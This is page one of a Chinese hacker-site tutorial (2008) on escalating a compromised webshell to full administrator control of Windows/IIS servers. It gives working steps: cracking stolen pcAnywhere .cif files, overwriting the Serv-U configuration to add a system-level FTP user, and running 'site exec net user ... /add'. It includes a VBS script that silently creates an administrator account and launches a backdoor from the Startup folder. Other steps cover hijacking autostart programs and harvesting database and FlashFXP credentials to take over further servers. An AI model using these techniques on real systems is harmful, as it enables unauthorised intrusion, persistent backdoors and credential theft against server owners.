通行证│用户名: 密码: 验证码: 验证码,看不清楚?请点击刷新验证码 电信网通铁通移动   在线
文章搜索:
热门搜索:红客 黑鹰 红客技术 安全动画 红客培训
首页 文章 软件 动画 资源 励志 论坛 邮箱 会员 军事 科技 博客 爱心红客 最近更新 800g资源
 业内新闻 漏洞公告 病毒公告 电脑知识 网络知识 菜鸟入门 攻防教程 黑客攻防 安全编程 工具使用 综合安全 个人安全 安全相关 Q Q安全 原创精华 红客人物 站内事件
您现在的位置: 爱国者安全网 >> 文章类 >> 红客教程 >> 网络攻防 >> 文章正文
推荐:经典的Webshell提权技术总结
责任编辑:酷酷の鱼   更新日期:2008-1-12
 
说到花了九牛二虎的力气获得了一个webshell, 
当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~ 
嘻嘻~~好跟我来,看看有什么可以利用的来提升权限 
**************************************************************************** 
第一 
如果服务器上有装了pcanywhere服务端,管理员为了管理方便 
也给了我们方便,到系统盘的Documents and Settings/All Us 
ers/Application Data/Symantec/pcAnywhere/中下载*.cif本地 
破解就使用pcanywhere连接就ok了 
**************************************************************************** 
第二 
有很多小黑问我这么把webshell的iis user权限提升 
一般服务器的管理都是本机设计完毕然后上传到空间里, 
那么就会用到ftp,服务器使用最多的就是servu 
那么我们就利用servu来提升权限 
通过servu提升权限需要servu安装目录可写~ 

好开始把,首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载 
下来,然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下覆盖, 
启动servu添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限 
然后去servu安装目录里把ServUDaemon.ini更换服务器上的。 

用我新建的用户和密码连接~ 
好的,还是连上了 
ftp 
ftp>open ip 
Connected to ip. 
220 Serv-U FTP Server v5.0.0.4 for WinSock ready... 
User (ip:(none)): id //刚才添加的用户 
331 User name okay, please send complete E-mail address as password. 
Password:password //密码 
230 User logged in, proceed. 
ftp> cd winnt //进入win2k的winnt目录 
250 Directory changed to /WINNT 
ftp>cd system32 //进入system32目录 
250 Directory changed to /WINNT/system32 
ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe 

文件加用户。 

如果提示没有权限,那我们就 
把后门(server.exe) 传他system32目录 
然后写一个VBs教本 
set wshshell=createobject ("wscript.shell") 
a=wshshell.run ("cmd.exe /c net user user pass /add",0) 
b=wshshell.run ("cmd.exe /c net localgroup Administrators user /add",0) 
b=wshshell.run ("cmd.exe /c server.exe",0) 


存为xx.vbe 
这个教本的作用是建立user用户密码为pass 
并且提升为管理员 
然后执行system32目录下的server.exe 
把这个教本传他 C:\Documents and Settings\All Users\「开始」菜单\程序\启动 
目录 
这样管理员只要一登陆就会执行那个教本. 
接下来就是等了.等他登陆. 
**************************************************************************** 
第三 
就是先检查有什么系统服务,或者随系统启动自动启动的程序和管理员经常使用的软件, 比如诺顿,VAdministrator,金山,瑞星,WinRAR甚至QQ之类的,是否可以写,如果可以就修改其程序, 绑定一个批处理或者VBS,然后还是等待服务器重启。 
**************************************************************************** 
第四 
查找conn和config ,pass这类型的文件看能否得到sa或者mysql的相关密码,可能会有所 
收获等等。 
**************************************************************************** 
第五 
使用Flashfxp也能提升权限,但是成功率就看你自己的运气了 
首先找到FlashFXP文件夹,打开(编辑)Sites. dat,这个文件这是什么东西密码和用户名, 
而且密码是加了密的。 如果我把这些文件copy回本地也就是我的计算机中,替换我本地的相应文件。然后会发现 打开flashfxp在站点中打开站点管理器一样。又可以添加N多肉鸡啦~~嘻嘻~ 

唔??不对啊,是来提升权限的啊,晕,接着来别半途而废。 
大家看看对方管理员的这站点管理器,有用户名和密码,密码是星号的。经过用xp星号密码 查看器查看,然后和Sites.dat中加密了密码做比较发现并未加密而是查到的密码是明文显示, 然后最终把这个网站管理员的密码从这堆东西中找 
出来。那么下一步就可以链接这些新的服务器啦~~ 
经过测试只要把含有密码和用户名的Sites.dat文件替换到本地相应的文件就可以在本地 
还原对方管理员的各个站点的密码。 
**************************************************************************** 
第六 

WIN2K+IIS5.0默认情况下应用程序保护选项是"中(共用的)",这时IIS加载isapi是用的 
iwam_computername用户身份执行。 
但默认情况下WIN2K+IIS5对于一些特殊isapi又要以system身份加载。win2k+iis5 、 
win2k+iis5+sp1、win2k+iis5+sp2都是简单的判断isapi的文件名,并且没有做目录限制, 
以SYSTEM权限加载的isapi有: 
1、 idq.dll 
2、 httpext.dll 
3、 httpodbc.dll 
4、 ssinc.dll 
5、 msw3prt.dll 
6、 author.dll 
7、 admin.dll 
8、 shtml.dll 
9、 sspifilt.dll 
10、compfilt.dll 
11、pwsdata.dll 
12、md5filt.dll 
13、fpexedll.dll 

 

[1] [2] 下一页

  • 上一篇文章:
  • 下一篇文章: 没有了
  • 最近更新
    普通文章 瑞星公司01月12日发布 每日计算机病毒及木马播报
    推荐文章 推荐:经典的Webshell提权技术总结
    普通文章 脚本后门的深入--图片中的后门
    普通文章 预防DDoS攻击的十项安全策略
    普通文章 利用调试积存器为加壳软件打补丁
    普通文章 Dll Show 4.7 汉化版注册算法
    普通文章 木马所有隐藏启动方式
    普通文章 后门程序知识完全解析
    普通文章 新的Rootkit可写入硬盘主引导区
    普通文章 英特尔CEO拒评Vista 对微软不满
    热门文章
    普通文章REAL蛀虫利用播放器漏洞下载恶意程序
    普通文章李彦宏:中国要在互联网领域逐渐超越美国
    普通文章马云:阿里巴巴的成功是一个生态链的成功
    普通文章Ingres用户认证非授权访问漏洞
    普通文章TCPreen FD_SET()函数远程栈溢出漏洞
    普通文章Winace UUE文件解压堆溢出漏洞
    普通文章Pclxav木马猎手第一代特征码引擎源代码
    普通文章IE收藏夹管理小精灵算法分析
    普通文章Extra Drive Pro算法分析历程
    普通文章雨过天晴自我注册
    精彩专题